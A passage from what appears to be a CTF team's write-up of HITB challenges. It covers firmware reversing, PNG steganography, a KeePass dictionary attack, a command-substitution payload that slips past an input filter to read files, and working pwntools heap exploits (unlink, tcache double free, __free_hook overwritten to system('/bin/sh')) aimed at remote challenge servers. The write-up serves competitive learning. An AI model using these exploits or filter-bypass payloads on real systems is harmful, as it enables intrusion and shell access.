<img src="https://i.imgur.com/w487Voi.png" alt=""></p>
<p>Now we have the flag <code>HITB{4e773ff1406800017933c9a1c9f14f35}</code></p>
<h3 id="hex-(sasdf)"><a class="header-link" href="#hex-(sasdf)"></a>hex (sasdf)</h3>
<p>A arduino challenge, data is in intelhex format. I use helper script <code>hex2bin.py</code> from intexHex python library to generate binary.</p>
<h4 id="first-try"><a class="header-link" href="#first-try"></a>First try</h4>
<p>Loaded in disassembler with MCU as AVR, you can easily find pattern below keep repeating started from 0x987 (in IDA, or 0x130e in radare2)</p>
<pre class="hljs"><code><span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r22</span>, <span class="hljs-number">0</span>xXX
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r24</span>, <span class="hljs-number">0x77</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r25</span>, <span class="hljs-number">0x01</span>
<span class="hljs-keyword">call</span> <span class="hljs-number">0xffa</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r22</span>, <span class="hljs-number">0xf4</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r23</span>, <span class="hljs-number">0x01</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r24</span>, <span class="hljs-number">0x00</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r25</span>, <span class="hljs-number">0x00</span>
<span class="hljs-keyword">call</span> <span class="hljs-number">0xbda</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r22</span>, <span class="hljs-number">0</span>xXX
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r24</span>, <span class="hljs-number">0x77</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r25</span>, <span class="hljs-number">0x01</span>
<span class="hljs-keyword">call</span> <span class="hljs-number">0xf62</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r22</span>, <span class="hljs-number">0x88</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r23</span>, <span class="hljs-number">0x13</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r24</span>, <span class="hljs-number">0x00</span>
<span class="hljs-keyword">ldi</span> <span class="hljs-built_in">r25</span>, <span class="hljs-number">0x00</span>
<span class="hljs-keyword">call</span> <span class="hljs-number">0xbda</span></code></pre><p>I dumped all <code>XX</code> bytes in previous pattern but didn&#39;t figure out how to decode it. So I decided to dig into these functions. It tooks me about half hour to manually decompile <code>fcn.ffa</code> to following (wrong) psuedo code:</p>
<pre class="hljs"><code>r26 = <span class="hljs-number">0x77</span>
<span class="hljs-keyword">if</span> r22 &gt;= <span class="hljs-number">136</span>:
    r31 = <span class="hljs-number">0</span>
    r30 = r22 &amp; <span class="hljs-number">0x7f</span>
    mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">4</span>] |= (<span class="hljs-number">1</span> &lt;&lt; r30)
    r22 = <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>:
    r22 + <span class="hljs-number">0x78</span>

<span class="hljs-keyword">if</span> r22 <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">6</span>:<span class="hljs-number">0x77</span>+<span class="hljs-number">0xc</span>]: <span class="hljs-comment"># six slots</span>
    <span class="hljs-keyword">try</span>:
        slot = mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">6</span>:<span class="hljs-number">0x77</span>+<span class="hljs-number">0xc</span>].index(<span class="hljs-number">0</span>)
    <span class="hljs-keyword">except</span>:
        mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">3</span>] = <span class="hljs-number">0</span>
        mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">2</span>] = <span class="hljs-number">1</span>
        <span class="hljs-keyword">return</span>
    mem[<span class="hljs-number">0x77</span>+<span class="hljs-number">6</span>+slot] = r22

fcn_e7e()</code></pre><p>I gave up.</p>
<h4 id="second-try"><a class="header-link" href="#second-try"></a>Second try</h4>
<p>After the third hint <code>Keyboard</code> is out, I suddenly realized that MCU of Arduino Micro is ATmega32u4, a USB enabled device, rather than common arduino MCU ATmega328p. Everything makes sense now. The structure in 0x77 must be USB keyboard report which has 6 slot (a obvious sign if you are familar with NKRO or know the difference between PS2 and USB keyboard). Here&#39;s source code from Arduino&#39;s Keyboard library:</p>
<pre class="hljs"><code><span class="hljs-keyword">size_t</span> Keyboard_::press(<span class="hljs-keyword">uint8_t</span> k) 
{
    <span class="hljs-keyword">uint8_t</span> i;
    <span class="hljs-keyword">if</span> (k &gt;= <span class="hljs-number">136</span>) {            <span class="hljs-comment">// it's a non-printing key (not a modifier)</span>
        k = k - <span class="hljs-number">136</span>;
    } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (k &gt;= <span class="hljs-number">128</span>) {    <span class="hljs-comment">// it's a modifier key</span>
        _keyReport.modifiers |= (<span class="hljs-number">1</span>&lt;&lt;(k<span class="hljs-number">-128</span>));
        k = <span class="hljs-number">0</span>;
    } <span class="hljs-keyword">else</span> {                <span class="hljs-comment">// it's a printing key</span>
        k = pgm_read_byte(_asciimap + k);
        <span class="hljs-keyword">if</span> (!k) {
            setWriteError();
            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
        }
        <span class="hljs-keyword">if</span> (k &amp; <span class="hljs-number">0x80</span>) {                        <span class="hljs-comment">// it's a capital letter or other character reached with shift</span>
            _keyReport.modifiers |= <span class="hljs-number">0x02</span>;    <span class="hljs-comment">// the left shift modifier</span>
            k &amp;= <span class="hljs-number">0x7F</span>;
        }
    }

    <span class="hljs-comment">// Add k to the key report only if it's not already present</span>
    <span class="hljs-comment">// and if there is an empty slot.</span>
    <span class="hljs-keyword">if</span> (_keyReport.keys[<span class="hljs-number">0</span>] != k &amp;&amp; _keyReport.keys[<span class="hljs-number">1</span>] != k &amp;&amp; 
        _keyReport.keys[<span class="hljs-number">2</span>] != k &amp;&amp; _keyReport.keys[<span class="hljs-number">3</span>] != k &amp;&amp;
        _keyReport.keys[<span class="hljs-number">4</span>] != k &amp;&amp; _keyReport.keys[<span class="hljs-number">5</span>] != k) {

        <span class="hljs-keyword">for</span> (i=<span class="hljs-number">0</span>; i&lt;<span class="hljs-number">6</span>; i++) {
            <span class="hljs-keyword">if</span> (_keyReport.keys[i] == <span class="hljs-number">0x00</span>) {
                _keyReport.keys[i] = k;
                <span class="hljs-keyword">break</span>;
            }
        }
        <span class="hljs-keyword">if</span> (i == <span class="hljs-number">6</span>) {
            setWriteError();
            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
        }    
    }
    sendReport(&amp;_keyReport);
    <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
}</code></pre><p>Ahh, <code>fcn.ffa</code> is <code>Keyboard::_press</code>!! It turns out that <code>fcn.f62</code> is <code>Keyboard::_release</code> and <code>fcn.bda</code>, which use timer register <code>TCNT0</code>, is <code>delay</code>.</p>
<p>Take our previous dump of parameters, convert it to keystroke, and the flag shows up.</p>
<pre class="hljs"><code>      $##&amp;:|#|                          !##| ;&amp;&amp;&amp;&amp;&amp;&amp;$#   #$##@|.    `%##@;  :@#$`
     |#|   |#|                         ;#%.  !#!       .%#|  #&amp;#!  |#|  #&amp;@:  :#%.
   ;#####|.|#|  .|####$`   #&amp;###|!@%.  ;#|   |#;              |#! :@$`   ;#%.`:@%.
     |#!   |#|   `.  :@$` ;#&amp;#  .%#%.  !#|  .%##@&amp;##@#      :&amp;#!  ;#%.   :@$`  #&amp;$`
     |#!   |#|  `%#####&amp;#.%#!#####;#%`!#@;          ;#$`   ;##!    ;#$`   ;#%.` $#$`
     |#!   |#| .%#@%&amp;@#&amp;#  |####&amp;&amp;#%.  ;#|   !##@@##%` :@#######$. `$##@##!   @%.</code></pre><p>P.S. I think if you find an Arduino Micro, burn the firmware, plug into PC, then you will get the flag in one hour. No reverse needed.</p>
<h2 id="misc"><a class="header-link" href="#misc"></a>misc</h2>
<h3 id="tpyx-(sces60107)"><a class="header-link" href="#tpyx-(sces60107)"></a>tpyx (sces60107)</h3>
<p>The png file is broken. It seems like We need to fix it first.
<code>pngcheck</code> tell us that it has crc checksum error</p>
<pre class="hljs"><code>$ pngcheck -v e47c7307-b54c<span class="hljs-number">-4316</span><span class="hljs-number">-9894</span><span class="hljs-number">-5</span>a8daec738b4.png 
File: e47c7307-b54c<span class="hljs-number">-4316</span><span class="hljs-number">-9894</span><span class="hljs-number">-5</span>a8daec738b4.png (<span class="hljs-number">1164528</span> bytes)
  chunk IHDR <span class="hljs-keyword">at</span> <span class="hljs-built_in">offset</span> <span class="hljs-number">0x0000c</span>, <span class="hljs-built_in">length</span> <span class="hljs-number">13</span>
    <span class="hljs-number">1024</span> x <span class="hljs-number">653</span> image, <span class="hljs-number">32</span>-bit RGB+alpha, non-interlaced
  chunk IDAT <span class="hljs-keyword">at</span> <span class="hljs-built_in">offset</span> <span class="hljs-number">0x00025</span>, <span class="hljs-built_in">length</span> <span class="hljs-number">1162839</span>
    zlib: deflated, <span class="hljs-number">32</span>K window, default compression
  CRC <span class="hljs-keyword">error</span> <span class="hljs-keyword">in</span> chunk IDAT (computed ecfb2a19, expected ba3de214)
ERRORS DETECTED <span class="hljs-keyword">in</span> e47c7307-b54c<span class="hljs-number">-4316</span><span class="hljs-number">-9894</span><span class="hljs-number">-5</span>a8daec738b4.png</code></pre><p>When you try to fix the crc checksum, you will notice that  the size of IDAT chunk is also wrong. The true size is 1164470 not 1162839</p>
<p>After corrected all faults, just use <code>zsteg</code> to detect any interesting things and also extract them.</p>
<pre class="hljs"><code>$ zsteg e47c7307-b54c<span class="hljs-number">-4316</span><span class="hljs-number">-9894</span><span class="hljs-number">-5</span>a8daec738b4_fixed.png
[?] <span class="hljs-number">1</span> bytes <span class="hljs-keyword">of</span> extra <span class="hljs-class"><span class="hljs-keyword">data</span> after image end (<span class="hljs-type">IEND</span>), offset = 0x11c4ef</span>
<span class="hljs-title">extradata</span>:imagedata .. file: zlib compressed <span class="hljs-class"><span class="hljs-keyword">data</span></span>
...
...
$ zsteg e47c7307-b54c<span class="hljs-number">-4316</span><span class="hljs-number">-9894</span><span class="hljs-number">-5</span>a8daec738b4_fixed.png -e extradata:imagedata &gt; zlibdata
$ python -c <span class="hljs-string">"import zlib; print zlib.decompress(open('zlibdata').read())"</span> &gt; <span class="hljs-class"><span class="hljs-keyword">data</span></span>
$ cat <span class="hljs-class"><span class="hljs-keyword">data</span></span>
<span class="hljs-number">377</span>abcaf271c000382f96c91300000000000000073000000000000003c0e24409c429fdb08f31ebc2361b3016f04a79a070830334c68dd47db383e4b7246acad87460cd00ba62cfae68508182a69527a0104060001093000070b0100022406f107010a5307cb7afbfaec5aa07623030101055d0000010001000c2c2700080a01c35b933000000501110b0066006c00610067000000120a010000844bf3571cd101130a010000e669e866d1d301140a010080ffcdd963d1d301150601008000000000001800345172634f556d365761752b5675425838672b4950673d3d
$ cat <span class="hljs-class"><span class="hljs-keyword">data</span> | xxd -r -p &gt; <span class="hljs-keyword">data</span></span>
$ file <span class="hljs-class"><span class="hljs-keyword">data</span></span>
<span class="hljs-class"><span class="hljs-keyword">data</span>.7z: 7-zip archive <span class="hljs-keyword">data</span>, version 0.3</span>
</code></pre><p>Now we have a 7z file, but we need password.
The 7z file is actually appended with the password.</p>
<pre class="hljs"><code>$ xxd data
<span class="hljs-number">00000000</span>: <span class="hljs-number">377</span>a bcaf <span class="hljs-number">271</span>c <span class="hljs-number">0003 82f9</span> <span class="hljs-number">6c91 3000</span> <span class="hljs-number">0000</span>  <span class="hljs-number">7</span>z..'.....l.<span class="hljs-number">0</span>...
<span class="hljs-number">00000010</span>: <span class="hljs-number">0000 0000</span> <span class="hljs-number">7300 0000</span> <span class="hljs-number">0000 0000</span> <span class="hljs-number">3</span>c0e <span class="hljs-number">2440</span>  ....s.......&lt;.$@
<span class="hljs-number">00000020</span>: <span class="hljs-number">9</span>c42 <span class="hljs-number">9</span>fdb <span class="hljs-number">08</span>f3 <span class="hljs-number">1</span>ebc <span class="hljs-number">2361</span> b<span class="hljs-number">301 6f04</span> a79a  .B......#a..o...
<span class="hljs-number">00000030</span>: <span class="hljs-number">0708 3033</span> <span class="hljs-number">4</span>c68 dd47 db38 <span class="hljs-number">3</span>e4b <span class="hljs-number">7246</span> acad  ..<span class="hljs-number">03</span>Lh.G.<span class="hljs-number">8</span>&gt;KrF..
<span class="hljs-number">00000040</span>: <span class="hljs-number">8746</span> <span class="hljs-number">0</span>cd0 <span class="hljs-number">0</span>ba6 <span class="hljs-number">2</span>cfa e<span class="hljs-number">685 0818</span> <span class="hljs-number">2</span>a69 <span class="hljs-number">527</span>a  .F....,.....*iRz
<span class="hljs-number">00000050</span>: <span class="hljs-number">0104 0600</span> <span class="hljs-number">0109 3000</span> <span class="hljs-number">070</span>b <span class="hljs-number">0100 0224</span> <span class="hljs-number">06</span>f1  ......<span class="hljs-number">0</span>......$..
<span class="hljs-number">00000060</span>: <span class="hljs-number">0701 0a53</span> <span class="hljs-number">07</span>cb <span class="hljs-number">7</span>afb faec <span class="hljs-number">5</span>aa0 <span class="hljs-number">7623 0301</span>  ...S..z...Z.v#..
<span class="hljs-number">00000070</span>: <span class="hljs-number">0105 5d00</span> <span class="hljs-number">0001 0001</span> <span class="hljs-number">000</span>c <span class="hljs-number">2c27 0008</span> <span class="hljs-number">0</span>a01  ..].......,'....
<span class="hljs-number">00000080</span>: c35b <span class="hljs-number">9330 0000</span> <span class="hljs-number">0501</span> <span class="hljs-number">110</span>b <span class="hljs-number">0066</span> <span class="hljs-number">006</span>c <span class="hljs-number">0061</span>  .[.<span class="hljs-number">0</span>.......f.l.a
<span class="hljs-number">00000090</span>: <span class="hljs-number">0067 0000</span> <span class="hljs-number">0012 0a01</span> <span class="hljs-number">0000</span> <span class="hljs-number">844</span>b f357 <span class="hljs-number">1</span>cd1  .g.........K.W..
<span class="hljs-number">000000a0</span>: <span class="hljs-number">0113 0a01</span> <span class="hljs-number">0000</span> e669 e866 d<span class="hljs-number">1d3 0114</span> <span class="hljs-number">0</span>a01  .......i.f......
<span class="hljs-number">000000b0</span>: <span class="hljs-number">0080</span> ffcd d963 d<span class="hljs-number">1d3 0115</span> <span class="hljs-number">0601 0080</span> <span class="hljs-number">0000</span>  .....c..........
<span class="hljs-number">000000c0</span>: <span class="hljs-number">0000 0018</span> <span class="hljs-number">0034 5172</span> <span class="hljs-number">634</span>f <span class="hljs-number">556d</span> <span class="hljs-number">3657 6175</span>  .....<span class="hljs-number">4</span>QrcOUm6Wau
<span class="hljs-number">000000d0</span>: <span class="hljs-number">2b56 7542</span> <span class="hljs-number">5838</span> <span class="hljs-number">672</span>b <span class="hljs-number">4950</span> <span class="hljs-number">673d</span> <span class="hljs-number">3d</span>         +VuBX8g+IPg==
$ <span class="hljs-number">7</span>z x data -p4QrcOUm6Wau+VuBX8g+IPg==
..
Extracting  flag
..
$ cat flag
HITB{<span class="hljs-number">0</span>c88d56694c2fb3bcc416e122c1072eb}</code></pre><h3 id="readfile-(sces60107)"><a class="header-link" href="#readfile-(sces60107)"></a>readfile (sces60107)</h3>
<p>It seems like the non-punctuation letter will be filtered.</p>
<p>So I try to readfile with <code>Arithmetic expansion</code></p>
<p>The payload is <code>$(&lt;/????/????_??_????/*)</code></p>
<p>Then we can read the flag <code>HITB{d7dc2f3c59291946abc768d74367ec31}</code></p>
<h3 id="pix-(sces60107)"><a class="header-link" href="#pix-(sces60107)"></a>pix (sces60107)</h3>
<p>Use <code>zsteg</code> to extract a keepassX database file</p>
<pre class="hljs"><code><span class="hljs-symbol">$</span> zsteg aee487a2<span class="hljs-number">-49</span>cd<span class="hljs-number">-4</span>f1f-ada6-b2d398342d99.SteinsGate
<span class="hljs-function"><span class="hljs-title">imagedata</span></span>           .. text: <span class="hljs-string">" !#865   "</span>
<span class="hljs-function"><span class="hljs-title">b1</span></span>,r,msb,xy         .. text: <span class="hljs-string">"y5b@2~2t"</span>
<span class="hljs-function"><span class="hljs-title">b1</span></span>,rgb,lsb,xy       .. <span class="hljs-keyword">file</span>: Keepass password database <span class="hljs-number">2.</span>x KDBX
<span class="hljs-function"><span class="hljs-title">b2</span></span>,r,msb,xy         .. text: <span class="hljs-string">"\rP`I$X7D"</span>
<span class="hljs-function"><span class="hljs-title">b2</span></span>,bgr,lsb,xy       .. text: <span class="hljs-string">"b;d'8H~M"</span>
<span class="hljs-function"><span class="hljs-title">b4</span></span>,g,msb,xy         .. text: <span class="hljs-string">";pTr73&amp; dvG:"</span>
<span class="hljs-symbol">$</span> zsteg aee487a2<span class="hljs-number">-49</span>cd<span class="hljs-number">-4</span>f1f-ada6-b2d398342d99.SteinsGate -e b1,rgb,lsb,xy &gt; keedatabase.kbdx</code></pre><p>Now we have to launch a dictionary attack against this database. then I found <a href="https://www.rubydevices.com.au/blog/how-to-hack-keepass">this</a></p>
<p>Finally, I found the password and also found the flag found the flag from the database.</p>
<p>The flag is <code>HITB{p1x_aNd_k33pass}</code></p>
<h2 id="pwn"><a class="header-link" href="#pwn"></a>pwn</h2>
<h3 id="once-(kevin47)"><a class="header-link" href="#once-(kevin47)"></a>once (kevin47)</h3>
<h4 id="vulnerability"><a class="header-link" href="#vulnerability"></a>Vulnerability</h4>
<ul class="list">
<li>Fd and bk of the link list can be overwritten</li>
</ul>
<h4 id="exploit"><a class="header-link" href="#exploit"></a>Exploit</h4>
<pre class="hljs"><code><span class="hljs-comment">#!/usr/bin/env python2</span>

<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">from</span> IPython <span class="hljs-keyword">import</span> embed
<span class="hljs-keyword">import</span> re

context.arch = <span class="hljs-string">'amd64'</span>

r = remote(<span class="hljs-string">'47.75.189.102'</span>, <span class="hljs-number">9999</span>)
lib = ELF(<span class="hljs-string">'./libc-2.23.so'</span>)

<span class="hljs-comment"># leak</span>
r.sendline(<span class="hljs-string">'0'</span>)
r.recvuntil(<span class="hljs-string">'choice\n'</span>)
x = r.recvuntil(<span class="hljs-string">'&gt;'</span>, drop=<span class="hljs-keyword">True</span>)
libc = int(x, <span class="hljs-number">16</span>) - <span class="hljs-number">0x6f690</span>
lib.address = libc
<span class="hljs-keyword">print</span> hex(libc)

<span class="hljs-comment"># stage 1</span>
<span class="hljs-comment"># overwrite bk</span>
r.sendline(<span class="hljs-string">'2'</span>)
ubin = libc + <span class="hljs-number">0x3c4b70</span><span class="hljs-number">-8</span>+<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>
r.send(flat(<span class="hljs-number">0xdeadbeef</span>, <span class="hljs-number">0x101</span>, <span class="hljs-number">0xdeadbeef</span>, ubin))
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'1'</span>)
<span class="hljs-comment"># unlink</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'3'</span>)   <span class="hljs-comment"># ubin -&gt; bss</span>

<span class="hljs-comment"># stage 2</span>
<span class="hljs-comment">#r.sendline('4')</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'4'</span>)
<span class="hljs-comment"># alloc on bss</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'1'</span>)
r.sendlineafter(<span class="hljs-string">'size:'</span>, str(<span class="hljs-number">0x100</span><span class="hljs-number">-8</span>))
<span class="hljs-comment"># write bss</span>
stdout, stdin = libc+<span class="hljs-number">0x3c5620</span>, libc+<span class="hljs-number">0x3c48e0</span>
binsh = libc+<span class="hljs-number">1625367</span>
payload = [
    <span class="hljs-number">0</span>, lib.symbols[<span class="hljs-string">'__free_hook'</span>],     <span class="hljs-comment"># link list bk to overwrite free hook</span>
    stdout, <span class="hljs-number">0</span>,
    stdin, <span class="hljs-number">0</span>,
    <span class="hljs-number">0</span>, binsh,     <span class="hljs-comment"># ptr containing "/bin/sh"</span>
    [<span class="hljs-number">0</span>]*<span class="hljs-number">10</span>,     <span class="hljs-comment"># flags = 0</span>
]
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'2'</span>)
r.send(flat(payload))
<span class="hljs-comment"># we can edit1 again :), plus bk is on free hook</span>
<span class="hljs-comment"># back to stage 1</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'4'</span>)

<span class="hljs-comment"># ovewrite free_hook</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'2'</span>)
r.send(flat(lib.symbols[<span class="hljs-string">'system'</span>]))

<span class="hljs-comment"># stage 2</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'4'</span>)
<span class="hljs-comment"># free(ptr) == system("/bin/sh")</span>
r.sendlineafter(<span class="hljs-string">'&gt;'</span>, <span class="hljs-string">'3'</span>)


r.interactive()

<span class="hljs-comment"># HITB{this_is_the_xxxxxxx_flag}</span></code></pre><h3 id="gundam-(kevin47)"><a class="header-link" href="#gundam-(kevin47)"></a>gundam (kevin47)</h3>
<h4 id="overview"><a class="header-link" href="#overview"></a>Overview</h4>
<pre class="hljs"><code><span class="hljs-symbol">Arch:</span>     amd64<span class="hljs-number">-64</span>-little
<span class="hljs-symbol">RELRO:</span>    Full RELRO
<span class="hljs-symbol">Stack:</span>    Canary found
<span class="hljs-symbol">NX:</span>       NX enabled
<span class="hljs-symbol">PIE:</span>      PIE enabled</code></pre><p>There are 4 operations:</p>
<ol class="list">
<li>Build a gundam</li>
<li>Visit gundams</li>
<li>Destroy a gundam</li>
<li>Blow up the factory</li>
</ol>
<p>The structure of a gundam is:</p>
<pre class="hljs"><code>     +---------+
     |<span class="hljs-string">flag     </span>|<span class="hljs-string">              0x100
     +---------+     +--------------------+
     </span>|<span class="hljs-string">name_ptr </span>|<span class="hljs-string">----&gt;</span>|<span class="hljs-string">        name        </span>|<span class="hljs-string">   
0x28 +---------+     +--------------------+
     </span>|<span class="hljs-string">type(str)</span>|
     |<span class="hljs-string">         </span>|
     |<span class="hljs-string">         </span>|
     +---------|</code></pre><ul class="list">
<li>An array of pointer to the gundam structure is on bss.</li>
<li>When a gundam is builded, the program malloc chunks of size 0x28 and 0x100 as shown above, set them properly, and store into the array of pointer on bss.</li>
<li>Visit gundams prints gundams&#39; index, name and type that are not destroyed.</li>
<li>Destroy a gundam sets the flag to 0 and frees the name</li>
<li>Blow up the factory frees the gundam structures that flag are 0.</li>
</ul>
<h4 id="vulnerability-1"><a class="header-link" href="#vulnerability-1"></a>Vulnerability</h4>
<ul class="list">
<li>Read name without ending null byte, which can be used to leak.</li>
<li>Destroy a gundam does not clear the name_ptr, which leads to use after free (double free).</li>
<li>The program is running with libc-2.26, which implemented a new feature called tcache to improve performance. However, it does not perform any sanity check for performance&#39;s sake. That is, fastbin dup attack  can be done anywhere any size without satisfying the size&#39;s contraint.</li>
</ul>
<h4 id="leak"><a class="header-link" href="#leak"></a>Leak</h4>
<ul class="list">
<li>Leaking libc addres will be a little bit more complicated than older versions of libc, since tache acts like fastbins and only have heap address on it.</li>
<li>However, tcache has a maximun of 7 chunks. By freeing more than 7 chunks, the remaining chunks will be treated as usual. That is, the chunks of size 0x100 will be at unsorted bins and small bins rather than tache, which contains libc address.</li>
</ul>
<h4 id="exploit-1"><a class="header-link" href="#exploit-1"></a>Exploit</h4>
<ul class="list">
<li>Leak libc and heap addresses.</li>
<li>Use fastbin dup attack to malloc a chunk on <strong>&amp;__free_hook</strong>. Note that in older version of libc we have to <code>free(a); free(b); free(a);</code> to bypass double free check. But tache doesn&#39;t check, so it can be done simply by <code>free(a); free(a);</code></li>
<li>Overwrite <strong>__free_hook</strong> to <strong>system</strong>. After that, Destroying a gundam with the name <code>/bin/sh</code>, which calls <code>free(name)</code> will be converted to <code>system(&quot;/bin/sh&quot;)</code></li>
</ul>
<pre class="hljs"><code><span class="hljs-comment">#!/usr/bin/env python2</span>

<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">from</span> IPython <span class="hljs-keyword">import</span> embed
<span class="hljs-keyword">import</span> re

context.arch = <span class="hljs-string">'amd64'</span>

r = remote(<span class="hljs-string">'47.75.37.114'</span>, <span class="hljs-number">9999</span>)
lib = ELF(<span class="hljs-string">'./libc.so.6'</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">build</span><span class="hljs-params">(name, typee)</span>:</span>
    r.sendlineafter(<span class="hljs-string">'choice : '</span>, <span class="hljs-string">'1'</span>)
    r.sendafter(<span class="hljs-string">'gundam :'</span>, name)
    r.sendlineafter(<span class="hljs-string">'gundam :'</span>, str(typee))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">visit</span><span class="hljs-params">()</span>:</span>
    r.sendlineafter(<span class="hljs-string">'choice : '</span>, <span class="hljs-string">'2'</span>)
    <span class="hljs-keyword">return</span> r.recvuntil(<span class="hljs-string">'1 . Build'</span>, drop=<span class="hljs-keyword">True</span>)

<span class="hljs-comment"># double free</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">destroy</span><span class="hljs-params">(idx)</span>:</span>
    r.sendlineafter(<span class="hljs-string">'choice : '</span>, <span class="hljs-string">'3'</span>)
    r.sendlineafter(<span class="hljs-string">'Destory:'</span>, str(idx))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">blow_up</span><span class="hljs-params">()</span>:</span>
    r.sendlineafter(<span class="hljs-string">'choice : '</span>, <span class="hljs-string">'4'</span>)


<span class="hljs-comment"># leak</span>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">9</span>):
    build(chr(<span class="hljs-number">0x11</span>*(i+<span class="hljs-number">1</span>))*<span class="hljs-number">16</span>, <span class="hljs-number">0</span>)
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">8</span>):
    destroy(i)
blow_up()
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">7</span>):
    build(chr(<span class="hljs-number">0x11</span>*(i+<span class="hljs-number">1</span>)), <span class="hljs-number">0</span>)
build(<span class="hljs-string">'a'</span>*<span class="hljs-number">8</span>, <span class="hljs-number">0</span>)
x = visit()
xx = re.findall(<span class="hljs-string">'0\] :(.*)Type\[0'</span>, x, re.DOTALL)[<span class="hljs-number">0</span>]
heap = u64(xx.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">'\x00'</span>)) - <span class="hljs-number">0x811</span>
xx = re.findall(<span class="hljs-string">'aaaaaaaa(.*)Type\[7'</span>, x, re.DOTALL)[<span class="hljs-number">0</span>]
libc = u64(xx.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">'\x00'</span>)) - <span class="hljs-number">0x3dac78</span>
lib.address = libc
<span class="hljs-keyword">print</span> hex(heap)
<span class="hljs-keyword">print</span> hex(libc)

<span class="hljs-comment"># exploit</span>
<span class="hljs-comment"># trigger double free libc 2.26 doesn't do any sanity check on tcache</span>
<span class="hljs-comment"># libc 2.26 is awesome!!</span>
destroy(<span class="hljs-number">2</span>)
destroy(<span class="hljs-number">1</span>)
destroy(<span class="hljs-number">0</span>)
destroy(<span class="hljs-number">0</span>)
blow_up()
build(flat(lib.symbols[<span class="hljs-string">'__free_hook'</span>]), <span class="hljs-number">0</span>)
build(<span class="hljs-string">'/bin/sh\x00'</span>, <span class="hljs-number">0</span>)
build(flat(lib.symbols[<span class="hljs-string">'system'</span>]), <span class="hljs-number">0</span>)
destroy(<span class="hljs-number">1</span>)

<span class="hljs-comment">#embed()</span>
r.interactive()

<span class="hljs-comment"># HITB{now_you_know_about_tcache}</span></code></pre><h3 id="d-(kevin47)"><a class="header-link" href="#d-(kevin47)"></a>d (kevin47)</h3>
<h4 id="overview-1"><a class="header-link" href="#overview-1"></a>Overview</h4>
<pre class="hljs"><code><span class="hljs-attr">Arch:</span>     amd64<span class="hljs-bullet">-64</span>-little
<span class="hljs-attr">RELRO:</span>    Partial RELRO
<span class="hljs-attr">Stack:</span>    Canary found
<span class="hljs-attr">NX:</span>       NX enabled
<span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> PIE (<span class="hljs-number">0x400000</span>)</code></pre><p>There are 3 operations:</p>
<ol class="list">
<li>Read message</li>
<li>Edit message</li>
<li><p>Wipe message</p>
</li>
<li><p>On read message, we enter a base64 encoded string, the program decodes it and stores in the heap, with ending null byte</p>
</li>
<li>Edit message read <code>strlen(message)</code> bytes to the message.</li>
<li>Wipe message frees the message and clears the pointer</li>
</ol>
<h4 id="vulnerability-2"><a class="header-link" href="#vulnerability-2"></a>Vulnerability</h4>
<ul class="list">
<li>Base64 decode does not check the length properly. If we send <code>&#39;YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYQ&#39;</code> which is <code>base64encode(&#39;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#39;)</code> without the ending <code>&#39;==&#39;</code>, the decoder miscalculates the length of the string, which leads to no ending null byte. Edit message then could be used to overwrite next chunk&#39;s size.</li>
</ul>
<h4 id="exploit-2"><a class="header-link" href="#exploit-2"></a>Exploit</h4>
<ul class="list">
<li>Use poinson null byte to create overlapped chunks.</li>
<li>Use fastbin dup attack to malloc a chunk on bss, where the pointers are.</li>
<li>We can overwrite the pointers, which leads into arbitrary memory write.</li>
<li>Change free@got to puts@plt, this enable us to leak libc address.</li>
<li>Change atoi@got to system. After this, when reading choice we can enter <code>/bin/sh</code>, which calls <code>atoi(buf)</code> that is <code>system(&#39;/bin/sh&#39;)</code> now.
<code>`</code>python 
